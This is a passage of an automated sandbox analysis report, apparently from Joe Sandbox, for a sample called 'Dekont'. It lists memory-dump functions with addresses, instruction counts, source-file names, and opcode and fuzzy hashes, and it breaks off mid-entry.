                                  • Opcode ID: 71be3e21d01b3e7c5ee0253029fedb877729b601d5dd23dbc5ee20c08b3bca6b
                                  • Instruction ID: 60479bde369e648d9a524e115a3d44677d7f8495ca6930e862f9ba2e6088bfbb
                                  • Opcode Fuzzy Hash: 71be3e21d01b3e7c5ee0253029fedb877729b601d5dd23dbc5ee20c08b3bca6b
                                  • Instruction Fuzzy Hash: 13710732200B01AFE732DF18C845F5ABBFAFF44750F148558E2969B2A1DB76E944CB50
                                  Function 00FD8AA0 Relevance: .2, Instructions: 197COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a35dc6fca6a7e14c112b7105167878abd77850f33d704642fcfa0b6483893114
                                  • Instruction ID: 8f84fa6c2e844eae5027c0ed47cd592947ba5ba5b998fe8e1858a7875577c872
                                  • Opcode Fuzzy Hash: a35dc6fca6a7e14c112b7105167878abd77850f33d704642fcfa0b6483893114
                                  • Instruction Fuzzy Hash: DE81A072A043069FDB24CF98D894BAD77F6BF88310F19416AD940AB391C7799D42DB90
                                  Function 01098DAE Relevance: .2, Instructions: 162COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fb4fcf6a190a0af23f189225b313fcef77c969de796758c1379bfef6d0909589
                                  • Instruction ID: 23ea41cf4451baf753f25b0aece8eaae36c7078a2d30ec315d7e3c45953d1cfa
                                  • Opcode Fuzzy Hash: fb4fcf6a190a0af23f189225b313fcef77c969de796758c1379bfef6d0909589
                                  • Instruction Fuzzy Hash: B851BF7260470A9FDB11DF28C860BAAB7E5EF85350F04892EFAC597290D734E908DB95
                                  Function 01078350 Relevance: .2, Instructions: 161COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aa4338268ba749bec218ca789fd05a0d6b65c63501438756d4347a30f4c9ae28
                                  • Instruction ID: 107d02ec534fd29fb46bf1cf7be0ea2ceab1d6a19e3f0ff58ab49b9a0c3813e4
                                  • Opcode Fuzzy Hash: aa4338268ba749bec218ca789fd05a0d6b65c63501438756d4347a30f4c9ae28
                                  • Instruction Fuzzy Hash: DF51AF70D007059FD721DF6AC888AABFBF8BF54710F10861ED2D2576A0CBB0A545CBA4
                                  Function 0100E443 Relevance: .2, Instructions: 158COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: eb4f3eb8b55e9259851383bb71a2b90d45bc478df550376a4f35566b4ad488f8
                                  • Instruction ID: fbf81224612330a3866e936d8d8327455ff48e1797ab27bb43948b4d03a1c588
                                  • Opcode Fuzzy Hash: eb4f3eb8b55e9259851383bb71a2b90d45bc478df550376a4f35566b4ad488f8
                                  • Instruction Fuzzy Hash: 5F518371200645DFDB22DF69C9C4EAAB3F9FF48744F5108A9E582A72A1D735ED40CB50
                                  Function 01074180 Relevance: .2, Instructions: 156COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0e818f74242ed4563bbfdf91751c2d00724e4dc0b8ef1b3070ac6608016de4f7
                                  • Instruction ID: 87131162596d40ef79a832b10faf84756f76d978cd3d2dffe42ab794098d8717
                                  • Opcode Fuzzy Hash: 0e818f74242ed4563bbfdf91751c2d00724e4dc0b8ef1b3070ac6608016de4f7
                                  • Instruction Fuzzy Hash: 75515771A083469FD754DF29C881A6BBBE5BFC8208F44892EF5C9C7250EB34D905CB5A
                                  Function 00FF45B1 Relevance: .2, Instructions: 156COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                  • Instruction ID: 7137f01c76030814b69b6170feec79e698d048f103a82ecbdcac337791de19dd
                                  • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                  • Instruction Fuzzy Hash: 26518F72E0021D9BDF15DB94C840BBFBBB9AF49754F044069EA01AB261D738EA44DB90
                                  Function 0105E9E0 Relevance: .2, Instructions: 154COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                  • Instruction ID: d9c809bdf5150a1cf9bee4882fb9715b7af5290295a5817164785271b3323fde
                                  • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                  • Instruction Fuzzy Hash: A451A671D00209AFEFA19E94C884BAFFBB5AB00325F154665EED2A7291D7349F40C7A0
                                  Function 01098B28 Relevance: .2, Instructions: 152COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e08f29b93f33e1fc54eb193463ead8dc612beb44b6eb2e2369d153e3551e1ea
                                  • Instruction ID: fedf9ddb57213c6d581ac5f4fa40ae12bc7073b7d9b729a64ede1809a64f3a77
                                  • Opcode Fuzzy Hash: 9e08f29b93f33e1fc54eb193463ead8dc612beb44b6eb2e2369d153e3551e1ea
                                  • Instruction Fuzzy Hash: 6441D6B07016499BDF69DB2DC864F7BBBDAAF82220F08C15AE9D587381D730D801E691
                                  Function 0105CBF0 Relevance: .1, Instructions: 148COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 56edb5b33c469c7ae31b22dc05a5c40facf511a6ff62cd0e596c35f1c3b2f56c
                                  • Instruction ID: 672a694bae5aa361ce11dc25e650a186d269087ae8aa02752fc5341057d0ca94
                                  • Opcode Fuzzy Hash: 56edb5b33c469c7ae31b22dc05a5c40facf511a6ff62cd0e596c35f1c3b2f56c
                                  • Instruction Fuzzy Hash: 3451AE72900319DFDBA0DFA9CA809AFBBF9FF48754B144559E985A3301D735A901CFA0
                                  Function 0100A430 Relevance: .1, Instructions: 139COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fcb69ea13ed73caacafce582fc3eb8e470a0fe087683c84927c4dcd4f6ab93c0
                                  • Instruction ID: 4f13f8afc028c2dd2938dbeaca662ad8561709ed8d815bd5ca4eda1d2356c27b
                                  • Opcode Fuzzy Hash: fcb69ea13ed73caacafce582fc3eb8e470a0fe087683c84927c4dcd4f6ab93c0
                                  • Instruction Fuzzy Hash: 1C41B771740301DFEB26EF6998C1BAE76A6BB59708F01007DE9C59B291EB7B98008B50
                                  Function 0109A9D3 Relevance: .1, Instructions: 139COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                  • Instruction ID: 0232ca0968fb5114c797937694746fb4cf6096d1033d1482871b2136a8250a6b
                                  • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                  • Instruction Fuzzy Hash: D041E531705716DFCF65CF28C9A0A6AB7E9FF84310B05466EE99287241EB34ED04D790
                                  Function 010001F8 Relevance: .1, Instructions: 138COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ecaef752e8564ae41976411dca7f53f21540558bffd186ba052feef9a9c8ebd0
                                  • Instruction ID: 433b6d945c3ff96b0d0c876add79448e49aa76ea051a560ca7b41877b6d53cc5
                                  • Opcode Fuzzy Hash: ecaef752e8564ae41976411dca7f53f21540558bffd186ba052feef9a9c8ebd0
                                  • Instruction Fuzzy Hash: 1E41DD31A00219DBEB16DF98C840BEEBBB4BF48740F14816AF985F7284D7359D41CBA4
                                  Function 00FFEBFC Relevance: .1, Instructions: 138COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 51278c5c2972e89f97d1f8845e6f7a28529e1adc1cfb86f1993a4cb7dadcfb69
                                  • Instruction ID: 4588040d83aa8682182fff99f7d6c02a834b13adfd854158afb3f89e0cf50eda
                                  • Opcode Fuzzy Hash: 51278c5c2972e89f97d1f8845e6f7a28529e1adc1cfb86f1993a4cb7dadcfb69
                                  • Instruction Fuzzy Hash: 5B41C2726003058FD720DF29C884A2BB7E9FF88314F144869FA96C7622EB75E844EB51
                                  Function 01012750 Relevance: .1, Instructions: 137COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                  • Instruction ID: a346b936ae7f7ae93d518773152baf199225914ee579450841776a383f1ec451
                                  • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                  • Instruction Fuzzy Hash: C5517CB5A40215CFDB55CF58C480AAEF7F2FF84710F2481A9D996AB351D734AE41CB90
                                  Function 00FD6154 Relevance: .1, Instructions: 133COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 759876072f729b832d72cf4345a7de8217650acb58732bb5b8a2aa7c31ccbf43
                                  • Instruction ID: 7543bfae1b3a0a6a17f462f6e9732b542e14d019cad2ca29b6688bf2fcc25b06
                                  • Opcode Fuzzy Hash: 759876072f729b832d72cf4345a7de8217650acb58732bb5b8a2aa7c31ccbf43
                                  • Instruction Fuzzy Hash: 6451E5709002469FDB35CB68CC01BA9B7B6EF45314F1842AAE459A73D6D7399981EF40
                                  Function 00FD0BCD Relevance: .1, Instructions: 130COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 03c42fc0df4ad32921c3e341a8b91c8a52f4bc82e0761a839b49faa053b72444
                                  • Instruction ID: 71189fadddfc5abcc2e8856d84526e6fbe5c902d2126d8131fbbf5c938075179
                                  • Opcode Fuzzy Hash: 03c42fc0df4ad32921c3e341a8b91c8a52f4bc82e0761a839b49faa053b72444
                                  • Instruction Fuzzy Hash: C441B472A402289FCB61EF68CD40BEA77B5EF44750F0501A6E948AB341DB74DE80DB91
                                  Function 0109866E Relevance: .1, Instructions: 129COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                  • Instruction ID: 827657dcdd41321e55e08cde30702f339a1188200da83cd21788e0fb60610263
                                  • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                  • Instruction Fuzzy Hash: 3441A875B0010DABDF15DF99CCA4AAFBBFABF89640F1480AAE584A7341D670DD00D7A0
                                  Function 00FD0887 Relevance: .1, Instructions: 128COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: daac762c8227614d16a46afc95a482e8cc9a11353914dc6290a488b0e45b32be
                                  • Instruction ID: e52cbd3a9746cb4675df64758bfe6eed496d48208877d43630a64eae15f9e8bd
                                  • Opcode Fuzzy Hash: daac762c8227614d16a46afc95a482e8cc9a11353914dc6290a488b0e45b32be
                                  • Instruction Fuzzy Hash: C841E5B16007019FD725CF25C890B26B7FAFF48314F284A6EE44687752EB35E845EB91
                                  Function 00FFA470 Relevance: .1, Instructions: 127COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8a94c124ee8cf196c6007b7e00c02803cb7d3fe09a0049d250d00e1ea030c893
                                  • Instruction ID: ecacc4d0653e71ccdf88b965629ea11f131f3913a461ab3d52154e21ae6dbe40
                                  • Opcode Fuzzy Hash: 8a94c124ee8cf196c6007b7e00c02803cb7d3fe09a0049d250d00e1ea030c893
                                  • Instruction Fuzzy Hash: 8141E1B2940209CFCB21DF68C8947FE77B4FF48320F1802A5D555AB2A5DB799901EFA1
                                  Function 00FD8BF0 Relevance: .1, Instructions: 124COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7e98b86420bc47cb66156e9af93609d4139ea670fe4997b33443867b08a59f40
                                  • Instruction ID: a201cd35c2e730074bcbc930ae56125dbd65af85d15318a66d6e20ad3a748162
                                  • Opcode Fuzzy Hash: 7e98b86420bc47cb66156e9af93609d4139ea670fe4997b33443867b08a59f40
                                  • Instruction Fuzzy Hash: BE410532911206CFD724DF48C850B5ABBB6FB84754F28812AE4419B395CB79D943DFA0
                                  Function 00FC8918 Relevance: .1, Instructions: 123COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fa1fe7270a4a1e7d0e6e9aff10726cee85f09926430a4e46f26c6455012ff13c
                                  • Instruction ID: 3e1618025710d6b457108fdea20f56de0582cfbce73e3824bdb90b768292bb09
                                  • Opcode Fuzzy Hash: fa1fe7270a4a1e7d0e6e9aff10726cee85f09926430a4e46f26c6455012ff13c
                                  • Instruction Fuzzy Hash: 6A4170325087169ED312DF64C941B6BB7E8BF84B94F40092EFA81D7160EB35DE059BA3
                                  Function 00FCA020 Relevance: .1, Instructions: 122COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                  • Instruction ID: 409d6a61e2018a625351eea0fd8c946d50c3d62bc871a579ee5611ad53c16b34
                                  • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                  • Instruction Fuzzy Hash: F6418232A0022ADBDB50DE18C541FBEB7B1EF4075CF1580AEE9808B241D637AD40EB92
                                  Function 00FD09AD Relevance: .1, Instructions: 122COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 266f41b7efc381ad59ea72f48b520982537e545ba122c4fd373e6f93d921a45a
                                  • Instruction ID: 5a4637a2700b182a77c4fa46486cce55e12630d8322e320f273bff30b6c02e79
                                  • Opcode Fuzzy Hash: 266f41b7efc381ad59ea72f48b520982537e545ba122c4fd373e6f93d921a45a
                                  • Instruction Fuzzy Hash: BC415971A40700EFD721CF19C841B2ABBE6EF48724F28856BE4498B351EB75E9429B91
                                  Function 01000710 Relevance: .1, Instructions: 121COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                  • Instruction ID: 07fb8a0605ca74d4aca405501dff90568560ff24027348bb97dfe6512c1983bd
                                  • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                  • Instruction Fuzzy Hash: 0B412671A00605EFEB25CF98C980BAABBF4FF08740F10496DE59AD7295D330AA44CF90
                                  Function 00FD262C Relevance: .1, Instructions: 119COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3ad2a3d21537a1d522d7a5cc6405f4eb716637a17621928adfa989337fba3dc8
                                  • Instruction ID: ffc12831fc1f6f7c5357d40352d906cf983c075d6109751cb2a942002279f168
                                  • Opcode Fuzzy Hash: 3ad2a3d21537a1d522d7a5cc6405f4eb716637a17621928adfa989337fba3dc8
                                  • Instruction Fuzzy Hash: B5419F71901700CFCB61EF68C901B59B7B2FF64720F1882AAD4469B3A1DB359941EF91
                                  Function 0100C8F9 Relevance: .1, Instructions: 116COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a77656febf9e0774f3f66548dacecba27844b77de467c95784daac2fdccf39b9
                                  • Instruction ID: fba5bf4c85abc6ceb6e3a40e5603402af28aff4a299e07514909f579b5f81d38
                                  • Opcode Fuzzy Hash: a77656febf9e0774f3f66548dacecba27844b77de467c95784daac2fdccf39b9
                                  • Instruction Fuzzy Hash: 903179B1A00645DFEB52CF98C540799BBF0FB49718F2085AED159EB291D7369902CF90
                                  Function 010507C3 Relevance: .1, Instructions: 114COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f09e4c40bf5c740197733314e1332acf9187c0ffd39dc6742354bf581f95f9e7
                                  • Instruction ID: 0d892773fb885063d66b631ed78b7a33bc6e3315e4be17fa2099f7cea17f0fad
                                  • Opcode Fuzzy Hash: f09e4c40bf5c740197733314e1332acf9187c0ffd39dc6742354bf581f95f9e7
                                  • Instruction Fuzzy Hash: 35418BB15083019FD360DF29C845BABBBE8FF88754F108A2AF9D897295D7749804CB92
                                  Function 010505A7 Relevance: .1, Instructions: 111COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e607a097c27590851b5c049a8ba6602f1a2526f7b65d760775dc244b55304628
                                  • Instruction ID: 1ab326c95c6a416529a88ff3b50eb80c74a1fe8e87e6d8dcd6bf1e81e502f98e
                                  • Opcode Fuzzy Hash: e607a097c27590851b5c049a8ba6602f1a2526f7b65d760775dc244b55304628
                                  • Instruction Fuzzy Hash: 9F41CF726046469FC360DF6CC840AAFB7E9FFC8700F144A69F9949B684E734E904C7A6
                                  Function 00FD4859 Relevance: .1, Instructions: 111COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cbfdb495889869dd5d122bc24421320f7b041af1640ed29152aaac7a0dec6ad5
                                  • Instruction ID: 5c5fb88a66a4f2a9e2fd1427e427935b49f2878505b5d7f957bb83ef8e9cfff9
                                  • Opcode Fuzzy Hash: cbfdb495889869dd5d122bc24421320f7b041af1640ed29152aaac7a0dec6ad5
                                  • Instruction Fuzzy Hash: 8341D0316003018BC725CF29D8A4B2BB7EAEF80360F18442EE9958B391DB35ED41EB52
                                  Function 00FE02E1 Relevance: .1, Instructions: 106COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                  • Instruction ID: bfb5df1b56cf55436ded880c430234a2edf8a737fed50e46b929c652575a284e
                                  • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                  • Instruction Fuzzy Hash: 20312A32A05284AFDB119B69CC40BDABFE9EF44350F1841B6F455DB352C6B8D984DB60
                                  Function 0107E3DB Relevance: .1, Instructions: 105COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b223c51eb7f739f03e46f6f16f856b66dd24dbadd04d2a45572b96dfe2355c5d
                                  • Instruction ID: ef54a8811c798dba057225a620f7a09f088f7fb212512e27fd6a84613edad0b4
                                  • Opcode Fuzzy Hash: b223c51eb7f739f03e46f6f16f856b66dd24dbadd04d2a45572b96dfe2355c5d
                                  • Instruction Fuzzy Hash: B131B971B41749ABD722AF59CC41FAF76A8EF48B50F100068F600AB391DFA9DD01D7A4
                                  Function 01084B4B Relevance: .1, Instructions: 104COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 297b507653cf46decbd2afed935e11e41fc57855f98d989133ddbd416e1590e6
                                  • Instruction ID: 1f6e8426a187a8d8b3717d037b274ca6aafd07508408075e3b371a0cabfd28e0
                                  • Opcode Fuzzy Hash: 297b507653cf46decbd2afed935e11e41fc57855f98d989133ddbd416e1590e6
                                  • Instruction Fuzzy Hash: 33318F326092159FC371EF19D880B6AB7E9FB84360F0A44AEE9D5DB351D736A840CF91
                                  Function 00FD4260 Relevance: .1, Instructions: 102COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c84d97e87b826dfa5295c7b85c94afc37dece304cdc921acc383707327504062
